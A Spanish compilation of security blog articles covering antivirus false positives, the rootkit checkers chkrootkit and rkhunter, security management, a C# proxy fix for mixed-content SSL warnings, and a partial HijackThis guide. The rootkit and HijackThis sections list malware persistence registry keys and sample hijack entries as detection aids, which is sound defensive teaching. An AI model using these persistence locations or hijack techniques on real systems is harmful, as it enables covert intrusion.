En las opiniones de prácticamente cualquier programa de Softonic se puede leer alguna acusación de que ese programa está infectado por este u otro virus, aunque la realidad suele ser bien distinta.

Puesto que nadie nace sabiendo y, además, muchas veces el antivirus no hace mucho por tratar de enseñarnos, usando terminología técnica que nadie tiene por qué conocer, vamos a ver algunas causas para que los antivirus marquen un programa limpio como infectado: los llamados falsos positivos.

Se denomina falso positivo al hecho de que un antivirus detecte erróneamente un archivo limpio como portador de virus. Generalmente la identificación no es exacta, es decir, el antivirus no dice “he encontrado el virus W32.ALGO” sino “he encontrado una variante de W32.ALGO”. Con la cantidad de variaciones que poseen los virus actuales, los antivirus se ven obligados a tratar de anticiparse a estas mutaciones con, podríamos llamarlo así, especulaciones.

Además, aunque no se tratan de falsos positivos, algunos antivirus incorporan la detección de todo tipo de elementos que consideran malware, software prescindible, software no deseado, software potencialmente dañino… Tiene muchos nombres. Es cierto que en ocasiones puede serlo, pero en otras se trata de un programa completamente legítimo que, simplemente, puede ser utilizado a su vez con fines oscuros.

Es el caso de…

• Dialers / Marcadores. Se trata de programas que utilizan el módem del ordenador para realizar llamadas telefónicas y, la mayoría de las veces, establecer una conexión a Internet con ellos. Hoy en día apenas se usan, por lo que muchos antivirus detectan este tipo de programas y muestran avisos al respecto.
• Descargadores. Son los gestores de descarga, programas que mejoran la función de bajar archivos del navegador. Algunos antivirus pueden decir que se tratan de una amenaza, sobre todo si se tratan de programas muy poco conocidos.
• Servidores FTP / Proxy / IRC / WEB / Telnet. A la mayoría de antivirus no les gusta que se instalen servidores o clientes de IRC en tu ordenador, ya que es el mecanismo utilizado por troyanos para llamar a casa. Si estás instalando uno de estos programas conscientemente, no tienes de qué preocuparte.
• Keylogger / Monitor. Programas que guardan un registro de lo que sucede en el ordenador: teclas pulsadas, páginas visitadas, conversaciones de chat. Aunque se trate de una aplicación comercial que quieras instalar (la razón es cosa tuya) tendrás que librar una batalla con tu antivirus para que lo permita.
• Recuperación de contraseñas. Programas para recuperar contraseñas perdidas.
• Administración Remota. Programas para permitir que otras personas conecten remotamente a tu equipo y puedan ver la pantalla, mover el puntero, transferir archivos…
• Herramientas. Diversas herramientas comúnmente utilizadas por hackers, aunque pueden ser utilizadas también para administración de redes, diagnóstico de errores, etc.
• Cracks. Programas para eliminar la protección de otro programa.
• Bromas. Bromas, por ejemplo errores falsos.
• Programas P2P. A algunos antivirus no les gustan los programas de descarga de archivos P2P.

Así pues, cuando tu antivirus te muestre que ha detectado una amenaza, debes fijarte en lo que te está diciendo. ¿Te está diciendo que el programa Remote Administrator que has bajado es un virus… o que es una aplicación potencialmente dañina?

El problema radica en que cada antivirus utiliza su nomenclatura, y en que esta es casi siempre en inglés. Veamos algunos de los prefijos que incluirá tu antivirus al nombre de la amenaza para referirse a este tipo de aplicaciones.

• Not-a-Virus. Su propio nombre lo indica. El archivo “no es un virus”, sino una aplicación que puede ser dañina si no la has instalado tú.
• Suspicious File. El archivo tiene algo sospechoso, pero no encaja con ninguno de los virus de la lista.
• Potentially Unwanted, Unwanted. Aplicaciones que en general podrías no querer en tu sistema.
• DoS, Exploit, HackTool, Email-Flooder, Flooder, Constructor, Nuker. Distintas herramientas de hacking.
• Hoax, Joke. Bromas que simulan errores, virus, etc.
• RAdmin, RemoteAdmin, Backdoor. Programas de administración remota.
• WTool, PSWTool. Recuperación de contraseñas
• Adware. Incorpora publicidad. Pero antes de arrojar este programa a la basura, piensa que la inclusión de barras de herramientas opcionales es muy común hoy en día. Tan sólo debes comprobar si la instalación de estos elementos de publicidad es obligatoria o no.

¿Qué hacer si dudas de si un programa está realmente infectado o no? Una buena opción es pedir una segunda opinión… o mejor, más de 30 opiniones más. Lo puedes conseguir enviando el archivo a VirusTotal.com o Virusscan.jotti.org, páginas que analizan con multitud de antivirus distintos la muestra, indicándote el resultado.

Fuente: http://es.onsoftware.com/p/en-ocasiones-veo-virus

autor: sergio.gonzalez.duran@gmail.com

De acuerdo a la definición en wikipedia un rootkit es una herramienta, o un grupo de ellas que tiene como finalidad esconderse a sí misma y esconder otros programas, procesos, archivos, directorios, llaves de registro, y puertos que permiten al intruso mantener el acceso a un sistema para remotamente comandar acciones o extraer información sensible, a menudo con fines maliciosos o destructivos.

De hecho que un hacker (black hat) te instale un root kit en tu equipo Linux es la máxima intrusión a la que estarías expuesto. Recuerda que en GNU/Linux el peligro no son virus como en el mundo Windows sino las vulnerabilidades que se descubren a diario en los muy distintos programas que usa el sistema. Por eso la importancia de verificar y actualizar lo más continuo posible el sistema en su totalidad.

En este artículo de LinuxTotal.com.mx te presento dos utilerías que te permitirán verificar tu equipo por posibles cambios en los archivos y programas más comunes, ya que ha menudo los rootkits se disfrazan como programas de uso muy comun como ls o ps, incluso conservan la misma funcionalidad (que es el objetivo, que el usuario no se entere que ya ha sido hackeado con un rootkit) pero a la vez de manera furtiva realizan su trabajo de ejecutar comandos remotos, abrir puertos, realizar ataques DoS, instalar servidores Web ocultos, utilizar ancho de banda para transferencia de archivos, monitorear con keylogers, etc., etc.

chkrootkit

chkrootkit muy popular checador de rootkits, verifica localmente por señales de estos. Es una buena opción para equipos Desktop, laptops, incluso para servidores como un complemento más de este tipo de programas.

Después de que lo descargues hay que compilarlo: (como root)

#> wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
#> tar xvzf chkrootkit.tar.gz
#> cd chkrootkit     (o el directorio donde se haya descomprimido)
#> make sense        (se compilan los fuentes en C)

Con lo anterior debes de tener ahora en el mismo directorio un binario llamado chkrootkit, se ejecuta sin argumentos de la siguiente manera:

#> ./chkrootkit 
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
...  
(varias líneas más de verificación de archivos, directorios y procesos)

Es posible ver la lista de pruebas que chkrootkit puede realizar mediante la opción -l y ejecutar solo una o varias a la vez:

#>./chkrootkit -l
./chkrootkit: tests: aliens asp bindshell lkm rexedcs sniffer w55808 
wted scalper slapper z2 chkutmp amd basename biff chfn chsh cron crontab 
date du dirname echo egrep env find fingerd gpm grep hdparm su ifconfig 
inetd inetdconf identd init killall  ldsopreload login ls lsof mail 
mingetty netstat named passwd pidof pop2 pop3 ps pstree rpcinfo rlogind 
rshd slogin sendmail sshd syslogd tar tcpd tcpdump top telnetd timed 
traceroute vdir w write
#> ./chkrootkit tar top         (verificamos solos dos pruebas)
ROOTDIR is `/'
Checking `tar'... not infected
Checking `top'... not infected

chkrootkit no tiene opción (al menos hasta la versión 0.48) para enviar a archivo el resultado del escaneo realizado, pero se resulve con direccionamiento:

#> ./chkrootkit >  chkrootkit20080414.txt

Puedes hacer un script donde se agregue la fecha automáticamente (ver Comando date, sus usos y respaldo de archivos) y a través de una entrada de cron ejecutarlo diariamente. Revisar y/o comparar esttos archivos diariamente te ayudarán a detectar cambios en tu sistema.

rkhunter

rkhunter en mi opinión, es un checador de rootkits mucho más completo y potente que chkrootkit, es ideal para ser usado en servidores. En su página de descarga sostiene (a modo de broma) que verifica en eun 99.9% que estás libre de indeseables rootkits, es decir, realmente se trata de una capa más de seguridad. rkhunter verifica el sistema por:

• Comparación de hashes MD5
• Busca por archivos comunes usados por rootkits
• Permisos equivocados para binarios
• Busca por cadenas de texto sospechosoas en módulos LKM (Loadable Kernel Modules) y KLD (Kernel Loadable Device)
• Busca por archivos ocultos
• Opciones de escaneo dentro de archivos binarios y planos

Después de descargar el tar.gz lo instalamos:

#> tar xvzf rkhunter-1.3.2.tar.gz
#> cd rkhunter                       (o el directorio donde se haya descomprimido)
#> ./installer.sh --layout default --show
PREFIX:             /usr/local
Application:        /usr/local/bin
Configuration file: /etc
Documents:          /usr/local/share/doc/rkhunter-1.3.2
Man page:           /usr/local/share/man/man8
Scripts:            /usr/local/lib/rkhunter/scripts
Databases:          /var/lib/rkhunter/db
Temporary files:    /var/lib/rkhunter/tmp

(lo que hice aqui fue mostrar previó a la instalación, 
donde quedarían la aplicación y demás con una instalación 'default')
(usa ./installer.sh para ver las opciones de la instalación)

(ahora si realizo la instalación)
#> ./installer.sh --layout default --install

Una vez instalado, la manera más básica de ejecutar rkhunter es asi:

#> rkhunter -c
[ Rootkit Hunter version 1.3.2 ]

Checking system commands...

  Performing 'strings' command checks
    Checking 'strings' command                               [ OK ]

  Performing 'shared libraries' checks
    Checking for preloading variables                        [ None found ]
    Checking for preload file                                [ Not found ]
    Checking LD_LIBRARY_PATH variable                        [ Not found ]

  Performing file properties checks
    Checking for prerequisites                               [ OK ]
    /bin/awk                                                 [ OK ]
    /bin/basename                                            [ OK ]
    /bin/bash                                                [ OK ]
    /bin/cat                                                 [ OK ]
    /bin/chmod                                               [ OK ]
    /bin/chown                                               [ OK ]
    /bin/cp                                                  [ OK ]
    /bin/csh                                                 [ OK ]
    /bin/cut                                                 [ OK ]
    /bin/date                                                [ OK ]
    /bin/df                                                  [ OK ]
  ....
  (varias líneas más)

rkhunter con la opción -c realiza un escaneo muy completo del sistema, no es posible apreciarlo aqui, pero en cada sección del escaneo la salida se interrumpe como para poder analizarlo, y hasta que no se presiones ‘Enter’ continua. Puedes deshacerte de este comportamiento interactivo con la opción –sk, por cierto, la lista de opciones o ayuda, la obtienes invocando rkhunter sin ningún argumento.

Si hubiera algo que reportar, el archivo /var/log/rkhunter.log, pero puedes cambiar la salida del archivo a otro que tu desees:

#> rkhunter -c --sk --logfile /root/rkhunter20080414.txt

Lo anterior enviará toda la salida al archivo indicado y sin hacer pausas para continuar. También es posible realizar pruebas personalizadas y no todas a la vez.

#> rkhunter --list   (lista de pruebas posibles)
Available test names:
    additional_rkts all apps attributes deleted_files filesystem
    group_accounts group_changes hashes hidden_procs immutable known_rkts
    local_host malware network none os_specific other_malware
    packet_cap_apps passwd_changes ports possible_rkt_files possible_rkts possible_rkt_strings
    promisc properties rootkits running_procs scripts shared_libs
    shared_libs_path startup_files startup_malware strings suspscan system_commands
    system_configs trojans

Grouped test names:
    additional_rkts => possible_rkt_files possible_rkt_strings
    group_accounts  => group_changes passwd_changes
    local_host      => filesystem group_changes passwd_changes startup_malware system_configs
    malware         => deleted_files hidden_procs other_malware running_procs suspscan
	...
(varias líneas más)

#> rkhunter --enable hidden_procs,system_commands   
(se ejecutan solo las pruebas deseadas)

#> rkhunter --disable system_commands   (lo contrario, se 
ejecutan todas las pruebas menos 
la indicada(s))

Como ya se mencionó previamente, es conveniente que se ejecute periódicamente a través de un cron y con un control por fechas de los reportes que se generan, asi se teendrá una bitacora muy completa de cuando pudieron ocurrir cambios en el sistema.

También, recuerda que estos anti-rootkits son solo una medida de seguridad más para la protección de tu sistema, hay que actualizar continuamente, apagar los servicios que no se usen, configurar adecuadamente ssh, apache, servidores de correo, etc.

Fuente: http://www.linuxtotal.com.mx/index.php?cont=info_seyre_011

Hace tiempo cuando empecé a abordar el tema de la seguridad informática cometí el error de pensar que la seguridad en una organización podía lograrse con una gran cantidad de herramientas y elementos técnicos. El tiempo, la experiencia y la permanente capacitación me han demostrado cuan equivocado estaba y es por eso que he decidido volcar en estas líneas algunos argumentos que ayuden a aquellos que recién comienzan a no cometer los mismos errores.

En el mundo actual la INFORMACIÓN es el elemento primordial de cualquier organización y por ende la SEGURIDAD DE LA INFORMACIÓN (SI) es un asunto tan importante como la información misma, pues afecta directamente a la organización o a individuos de la misma.

Como aprendimos en la escuela siempre que hay un proceso de comunicación los elementos que intervienen son: la información transmitida, el emisor, el medio por el cual se transmite y el receptor.
Si acordamos en llamar ACTIVOS a estos elementos entonces, podremos identificar lo que la SI debe proteger:

• a información
• los equipos que la soportan
• las personas que la utilizan

El primer paso para abordar el tema de la SI es reconocer los RIESGOS a los que están expuestos esos activos y el impacto que esto origina a los objetivos de la organización.

Actualmente existen infinidad de legislaciones, políticas, normas, metodologías y herramientas que dan soporte a la SI y que pueden ser libremente utilizadas por las organizaciones a fin de ordenar la gestión de la seguridad.

Algunas de estas normas simplemente buscan la normalización de las tareas, como es el caso de la ISO 17799, y otras tienen como objetivo la certificación internacional en estos temas, como la ISO-9001 o la BS-7799.

Más allá de cual sea el criterio aplicado, incluso puede ser uno propio, llegaremos a que todas las etapas se pueden resumir en el concepto que la SI tiene como objetivo preservar:

• CONFIDENCIALIDAD: la información debe ser accesible sólo a aquellas personas autorizadas a tal fin.
• INTEGRIDAD: la información y sus métodos de procesamiento deben ser completos y exactos.
• DISPONIBILIDAD: la información y sus recursos relacionados deben estar disponibles cada vez que se los requiera.

Para lograr estos objetivos es fundamental contar con el acuerdo y compromiso de todos los involucrados, ser acordes y estar alineados a los objetivos generales de la organización.

Así, es más que claro que la seguridad que puede lograrse por medios técnicos es limitada y debe ser respaldada por una gestión, política y procedimientos adecuados que consideren a las personas como el primer eslabón, y generalmente el más débil, de una compleja cadena de responsabilidades.

Abordar el problema de minimizar (o eliminar) estos riegos es un gran desafío pero lograremos un gran avance con tan solo organizar la gestión, aprovechar las opciones de seguridad de los sistemas utilizados, aprender a eliminar las configuraciones por defecto, utilizar herramientas licenciadas (o libres) y aprovechar la experiencia y base de conocimientos de aquellos que ya han superado exitosamente este desafío.

La evaluación de riesgos y, en general, las mejoras en la gestión de la SI puede aplicarse a toda la organización o solo a partes de la misma.

Para evaluar los riesgos se deben tener en cuenta las consecuencias (impacto potencial de una falla) y la probabilidad de que dicha falla ocurra. Estas fallas generalmente serán el producto de las amenazas y vulnerabilidades existentes y, los controles implementados para minimizarlas.

Una vez identificados los riesgos que enfrenta la organización y que atentan contra las tres propiedades deseables de la Información, deberemos establecer los requerimientos mínimos de seguridad deseados.

Para ellos deberemos analizar los riesgos identificados, los requisitos externos (leyes, contratos, reglamentaciones, etc.) y los requisitos internos que ha desarrollado la organización para respaldar sus operaciones (métodos de procesamiento de la información, normas, procesos, etc.).

La selección de los controles a implementar puede hacerse sobre normativas y estándares existentes o diseñarse nuevos en base a la experiencia y necesidades a satisfacer. Luego de evaluar los controles se tendrá un costo estimado de implementación que deberá contrastarse con los costos de asumir los riesgos.

Una vez seleccionados los controles a realizar para minimizar los riesgos identificados se deberá contar con un método de medición adecuado que nos permita establecer fehacientemente que dichos controles son efectivos habiendo logrado los resultados esperados.

Por último esta metodología deberá ser revisada periódicamente para identificar nuevos riesgos y controles a implementar. Así, habremos logrado un metodología de MEJORA CONTINUA en materia de SI que puede resumirse como:

Lo que es monitoreado, puede ser medido, y lo que es medido puede ser gestionado. En este proceso es vital la correcta definición de los indicadores de desempeño.

Según el Modelo de Shewhart-Deming de Mejora Continua citado anteriormente

(PHVA = Planificar-Hacer-Verificar-Actuar o PDCA = Plan-Do-Check-Act en inglés), estos indicadores nos dirán si:

• lo que se Planeo se implementó (Planificación -> Implementación)
• lo que se Implementó se revisó (Implementación -> Verificación)
• lo que se Revisó se mantuvo y se mejoró (Verificación -> Acción)

Recordemos que el objetivo de la mejora continua debe ser soportado por un proceso de gestión y no por un proceso tecnológico.

Al ser este un proceso largo y tedioso, la política de seguridad podrá ser llevada a la práctica de la mejor manera posible siempre y cuando se definan claramente las tareas a realizar y el plan de acciones asociado. Para esta etapa es recomendable dividir estas tareas en:

• Establecer objetivos y alcance de la política. La misma no necesariamente debe alcanzar toda la organización.
• Clasificar, identificar y valorar los riesgos. Decidir las acciones a tomar sobre los riesgos.
• Seleccionar los controles a implementar para mitigar los riesgos.
• Formular un plan concreto de las acciones a realizar.
• Capacitar.
• Implementar los controles.
• Realizar revisiones y mediciones para verificar la efectividad de los controles implementados.
• Implementar mejoras sobre el modelo actual.

Por supuesto, y como ya se ha mencionado esta política debe llevarse a cabo con el respaldo y compromiso de la dirección, teniendo en cuenta que muchos de los controles implementados serán efectivos solamente con una adecuada capacitación de todos los involucrados.

Sea cual sea la metodología aplicada y la forma de llevarla a cabo esta debe ser:

• Medible: puede ser auditada por una tercera parte independiente.
• Replicable: en la medida en que el sistema es formal y contiene procesos estructurados facilitará la replicación del sistema en otro lugar.
• Escalable: los procesos y controles establecidos pueden ser desarrollados centralmente y luego distribuídos o bien, incorporarse nuevos procesos .

Fuente: http://www.segu-info.com.ar/
Autor: Lic. Cristian F. Borghello

Cuando trabajamos con páginas SSL es bastante molesto encontrarse con un mensaje del navegador indicando que “La página Web que está abriendo contiene elementos seguros como no seguros. ¿Desea mostrar los elementos no seguros?”

Este mensaje además de molesto – sale siempre – resulta cuanto menos “inquietante” y puede provocar que más de un usuario salga inmediatamente de nuestro sitio Web. Algo especialmente grave si se trata de un sitio web dedicado a la venta online.

¿Como evitarlo?. Para responder a esta pregunta lo primero que debemos saber en porque se está produciendo. Este mensaje se muestra cuando dentro de un entorno SSL (protocolo https) existe alguna petición http. Es decir, en nuestra página hay elementos apuntado a una URL absoluta con protocolo http. Estos elementos pueden ser imagenes, scripts, css …

Un ejemplo claro es cuando incluimos una pelicula flash en nuestra página, por defecto, el enlace incluye una redirección a la página de adobe para descargar el reproductor en el caso de que no lo tengamos instalado. Ese enlace es absoluto a través de http – por lo que provoca el molesto error.

Este sería un enlace a una pelicula flash tipico:

 

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" 

codebase="http://download.macromedia.com/.../swflash.cab#version=5,0,0,0" 

width="516" height="76" id="ShockwaveFlash1">

	<param name="movie" value="mipelicula.swf"/>

	<param name="quality" value="high"/> 

	<param name="bgcolor" value="#000000"/>

</object> 

Este enlace no muestra ningún error cuando estamos sobre un entorno http – tipicamente el entorno de desarrollo -, pero cuando pasamos a un entorno https – producción – muestra el mensaje debido al enlace http://download.macromedia.com/…/swflash.cab#version=5,0,0,0 que contiene.

En este caso la solucion es sencilla, bastará con quitar el enlace http la etiqueta.

 

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" 

width="516" height="76" id="ShockwaveFlash1">

	<param name="movie" value="mipelicula.swf"/>

	<param name="quality" value="high"/> 

	<param name="bgcolor" value="#000000"/>

</object>

Pero no siempre es tan fácil solucionar el error. Cuando no podemos o no queremos eliminar el enlace – por ejemplo un javascrit – tendremos que recurrir a otros métodos.

Por ejemplo, cuando utilizamos Google Analytics, tenemos que incluir el siguiente script en nuestra página.

	<script src="http://www.google-analytics.com/urchin.js" 

		type="text/javascript"></script>

En este caso necesitaremos programar una página intermedia – que se trasmita por https – y que realice la solicitud a la dirección http y devuelva el mismo contenido. En nuestro caso, utilizamos ASP.NET por lo que nuestra página es aspx – pero la idea es válida para cualquier entorno web php, jsp, RoR …

 

	<script src="GetScript.aspx" 

		type="text/javascript"></script>

Y nuestra página GetScript.aspx (debemos incluir una directiva using System.Net;):

 

 protected void Page_Load(object sender, EventArgs e)

 {

	string httpUrl = "http://www.google-analytics.com/urchin.js";

	WebRequest httpRequest = WebRequest.Create(httpUrl);

	WebResponse httpResponse = httpRequest.GetResponse();

	System.IO.Stream webStream = httpResponse.GetResponseStream();

	System.IO.StreamReader reader = 

		new System.IO.StreamReader(webStream );

	string html = reader.ReadToEnd();

	

	Response.Write(html); 

 }

En el caso de que la conexion salga a través de un servidor proxy:

 

 protected void Page_Load(object sender, EventArgs e)

 {

	string httpUrl = "http://www.google-analytics.com/urchin.js";

	WebRequest httpRequest =WebRequest.Create(httpUrl);

	

	// En el caso de utilizar un servidor proxy

	IWebProxy proxy = WebRequest.GetSystemWebProxy();

	if (proxy != null && proxy.Credentials != null)

	{

		httpRequest.Proxy = proxy; 

	}

	else

	{

		proxy = new WebProxy("<servidor proxy>:<puerto>");

		NetworkCredential credenciales = 

			new NetworkCredential("<usuario>", "<clave>");

		proxy.Credentials = credenciales;

		httpRequest.Proxy = proxy;

	}

	WebResponse httpResponse = httpRequest.GetResponse();

	System.IO.Stream webStream = httpResponse.GetResponseStream();

	System.IO.StreamReader reader = 

		new System.IO.StreamReader(webStream);

	

	string html = reader.ReadToEnd();

	Response.Write(html); 

 }

Finalmente, si lo que queremos es “rizar el rizo”, en lugar de utilizar una página – que entre otros inconveniente tiene que ejecuta su ciclo de vida completo – sería mejor utilizar un manejador http.

Para eso, creamos nuestro propio manejador de peticiones como se muestra a continuación.

 

<%@ WebHandler Language="C#" Class="Handler" %>

 

using System;

using System.Web;

using System.Net;

 

public class Handler : IHttpHandler {

 public void ProcessRequest (HttpContext context) 

 {

	context.Response.ContentType = "text/javascript";

	context.Response.Write(GetData()); 

 }

 private string GetData()

 {

	string httpUrl = "http://www.google-analytics.com/urchin.js";

	WebRequest httpRequest = WebRequest.Create(httpUrl);

	// En el caso de utilizar un servidor proxy

	IWebProxy proxy = WebRequest.GetSystemWebProxy();

	if (proxy != null && proxy.Credentials != null)

	{

		httpRequest.Proxy = proxy;

	}

	else

	{

 

		proxy = new WebProxy("<servidor proxy>:<puerto>");

		NetworkCredential credenciales = 

			new NetworkCredential("<usuario>", "<clave>");

		proxy.Credentials = credenciales;

		httpRequest.Proxy = proxy;

	}

	WebResponse httpResponse = httpRequest.GetResponse();

	System.IO.Stream webStream = httpResponse.GetResponseStream();

	System.IO.StreamReader reader = 

		new System.IO.StreamReader(webStream);

	string html = reader.ReadToEnd();

	

	return html;

 }

public bool IsReusable 

 {

	get {

	return false;

	}

 }

}

Luego definimos una extension de archivo – en nuestro caso jsx – , incluimos el manejador en el web.config y cambiamos el enlace de la página para que apunte a un recurso .jsx

 

 <httpHandlers> 

	<add verb="GET" path="*.jsx" validate="false" type="Handler"/>

 </httpHandlers>

	<script src="GetScript.jsx" type="text/javascript"></script>

Saludos,

Fuente: http://www.devjoker.com/contenidos/Articulos/410/La-p%C3%A1gina-Web-que-est%C3%A1-abriendo-contiene-tanto-elementos-seguros-como-no-seguros.aspx

Índice:
1. ¿Qué es Hijackthis y para qué nos sirve?
2. Instalación de Hijackthis y otras herramientas a utilizar.
3. Sacando nuestro Log.
4. Analizando logs.
5. Solucionando problemas.

Una vez descargado y con todos los programas cerrados procedemos a ejecutar la nueva instalación automatizada que no traían versiones anteriores.
Elegimos la ruta de instalación y aceptamos el contrato. Automáticamente se abrirá Hijackthis y se añadirá un icono de acceso directo en nuestro escritorio.
Después de esta secuencia de pasos, se verá una imagen así:

A continuación analizaremos su salida.

F0, F1, F2, F3: Programas cargados a partir de ficheros  *.ini (system.ini, win.ini)

N1, N2, N3, N4: las URL de paginas de inicio/búsqueda de Netscape o Firefox.

O1: Redirecciones mediante aviso del fichero HOSTS.

O2: BHO (Browser Help Object); Son plugins para aumentar la funcionalidad de Internet, pero también pueden ser spywares.

O3: Toolbars del IE. (Internet Explorer).

O4: Aplicaciones que cargan en el inicio automático de Windows, ya sea desde el registro o desde la carpeta Inicio.

O5: Son las opciones de IE no visibles desde el panel de control de Windows.

O6: Acceso restringido por el Administrador a las opciones de IE.

O7: Acceso restringido por el Administrador al Registro.

O8: Elementos encontrados en el menú contextual del IE.

O9: Botones adicionales que se encuentran en la barra de herramientas de IE. Ej. : Flasget, DAP, Encarta, etc.

O10: Winsock Hijackers.

O11: Adición de un grupo extra en las opciones avanzadas de IE.

O12: Plugins para IE.

O13: Hijack del prefijo en IE.

O14: Hijack de la configuración por defecto del IE.

O15: Sitios no autorizados en la zona segura configurada por IE.

O16: Objetos ActiveX.

O17: Hijack del Dominio / Lop.com

O18: Protocolos extra / Hijack de estos.

O19: Hijack de la hoja de estilo del Usuario

O20: Valores del registro auto ejecutables AppInit_DLLs.

O21: Llaves del registro auto ejecutables ShellServiceObjectDelayLoad.

O22: Llaves del registro auto ejecutables SharedTaskSheduler.

O23: Servicios.

Aquí, están detallados cada uno de los componentes. Ahora veremos, como podemos corregir algún problema a raíz de lectura de estos indicadores.

5. Solucionando problemas del sistema con Hijackthis.

Grupo de R0, R1, R2, R3.
En este caso, si las URL que aparecen aquí han sido configuradas por nosotros no habrá problema y las dejamos como están.
Pero, si estas no han sido puestas por nosotros, tienen direcciones muy extensas y no las conocemos la marcamos y damos a Fix Checked.

Ejemplo Bueno:

R0 - HKCU\Software\Microsoft\Internet Explorer\Main, Start Page = www.google.com.ar

Ejemplo Malo:

R1 - HKCU\Software\Microsoft\Internet Explorer\Main, Search Bar =  res://C:\WINDOWS\TEMP\se.dll/sp.html

NOTA: R2, ya no es utilizado.

Siguiendo con R3:
R3 es la referencia usada por Search Hook. Si introducimos manualmente una URL como pagina de inicio sin especificar un protocolo (http: //, ftp://) el navegador tratara de encontrar uno automático y en caso de que no lo logre, acudirá a URL Search Hook.

Ejemplo Bueno:
R3 – Default URLSearchHook is missing

Ejemplo Malo, marcar y dar a ‘Fix Checked’

R3 - URLSearchHook: (no name) - _ {CFBFAE00-17A6-11D0-99CB-00C04FD64497} - (no file)

F0: Según las fuentes que he consultado es recomendable que si se encuentra una línea que comience con F0, marcarla y darle a continuación a Fix Checked.

F1: Programas antiguos utilizados por Win 3.1/95/98 que viene adjuntado en el archivo win.ini en las claves Run= y Load=. En este caso debemos buscar información antes de marcar y dar a Fix Checked.

F2 y F3: Son lo mismo que los anteriores, pero usan el núcleo NT, estoy hablando de Windows NT/2000/XP, que no usan del mismo modo a los archivos de inicio: system.ini y win.ini ya nombrados anteriormente.
Algunos ejemplos de referencia:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\IniFileMapping
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit=[**]\system32\userinit.exe,[**]\moralla.exe

Si bajo Win NT encuentran el valor por defecto: userinit,nddeagnt.exe, es normal bajo ese sistema. Pero cualquier otro ejecutable es altamente probable que se trate de spyware y/o troyano.

URL’s de páginas de inicio/búsqueda en Netscape/Mozilla.

N1: Se refiere a la página de inicio y motor de búsqueda de Netscape 4
N2: Se refiere a la página de inicio y motor de búsqueda de netscape 6
N3: Se refiere a la página de inicio y motor de búsqueda de Netscape 7.
N4: Corresponde a la página de inicio y motor de búsqueda de Mozilla Firefox.

Se encuentran comúnmente en los archivos : prefs.js.

NOTA:
Actualmente el mayor porcentaje de spywares, malwares, Hijackers están hechos para IE y no para Mozilla,Netscape o Opera, por lo qué estos se mantienen un poco más a salvo que el IE mencionado anteriormente.

Qué hace el archivo Hosts?.
El archivo Hosts, funciona como una especie de convertidor o el encargado de establecer las relaciones entre Dirección IP y Hostnames.

127.0.0.1 www.google.com

Si tratas de ir a www.google.com, revisará el archivo hosts, verá la entrada y la convertirá a la dirección IP 127.0.0.1.
En este cuadro, verás las rutas de instalación por defecto del archivo Hosts:

Si ves entradas como las mostradas arriba y no hay una razón específica por la cuál sepas que deban estar ahí, puedes borrarlas con seguridad.

Si ves que el archivo hosts está localizado en C:\Windows\Help\hosts, eso significa que estás infectado con el CoolWebSearch. Si notas que el archivo hosts no está en su ruta por defecto de tu sistema operativo entonces, en el escaneo de Hijackthis, marca la entrada y dale Fix Checked u otro programa que limpie el archivo Hosts.

Si no eres un usuario muy avanzado en Hijackthis y no quieres complicarte, puedes usar el programa Hoster, el cual permite restaurar el archivo hosts a su configuración por defecto en tu sistema.
Para hacer esto, baja el programa Hoster desde aquí : Descargar Hoster. Ejecútalo, una vez abierto, pulsa en el botón “Restore Original Host” y una vez hecho esto cierra el Hoster.

Ejemplo de BHO Real:

BHO: NAV Helper - - C:\Program Files\Norton Antivirus\NavShExt.dll

Para arreglar este tipo de entradas, podemos consultar una lista como ésta, alojada en Sysinfo. Se puede consultar aquí: http://sysinfo.org/bholist.php

Cuando estemos consultando la lista, debemos hacer énfasis en el CLSID, que es el número entre las claves en la lista. El CLSID en el listado hacen referencias a entradas del registro que contienen información acerca de los BHO.

Una vez, detectadas las entradas malignas procederemos a marcarlas y darle “Fix Checked”. Pero, en ese momento Hijackthis querrá cerrarlas al instante y no podrá hacerlo, ya que estarán en uso.
En este caso lo que deberemos hacer es entrar en modo Seguro con la tecla F8 antes que inicie el sistema y borrarlo manualmente.

Éstas se encuentran en la siguiente llave del registro:

HKLM\SOFTWARE\Microsoft\Intenet Explorer\Toolbar

Ejemplo:

Toolbar: Norton Antivirus - - C:\Program Files\Norton Antivirus\NavShExt.dll

Si estas entradas, no están aceptadas por ti o no reconoces sus nombres puedes consultar la lista de Sysinfo que está en el grupo anterior, para encontrar la entrada y ver si sirve en tu sistema o no. Si es algo que no quieras en tu sistema, puedes borrarlo con tranquilidad, como antes lo hacíamos: Marcando la entrada y clic en Fix Checked.
En este grupo, sucede lo mismo que en el grupo anterior. Hijackthis intentará borrar las entradas seleccionadas pero no será posible borrar algunas, tendrás qué entrar en modo seguro para borrarlas manualmente.

- Las llaves del registro, donde se pueden alojar estas aplicaciones son estas:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices 
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices 
HKLM\Software\Microsoft\Windows\CurrentVersion\Run 
HKCU\Software\Microsoft\Windows\CurrentVersion\Run 
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx 
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

NOTA : HKLM = HKEY_LOCAL_MACHINE – HKCU = HKEY_CURRENT_USER.

Se pueden distinguir dos carpetas donde se pueden iniciar las aplicaciones:

Startup: C:\Documents and Settings\USERNAME\Start Menu\Programs\Startup -> Usuario en particular.
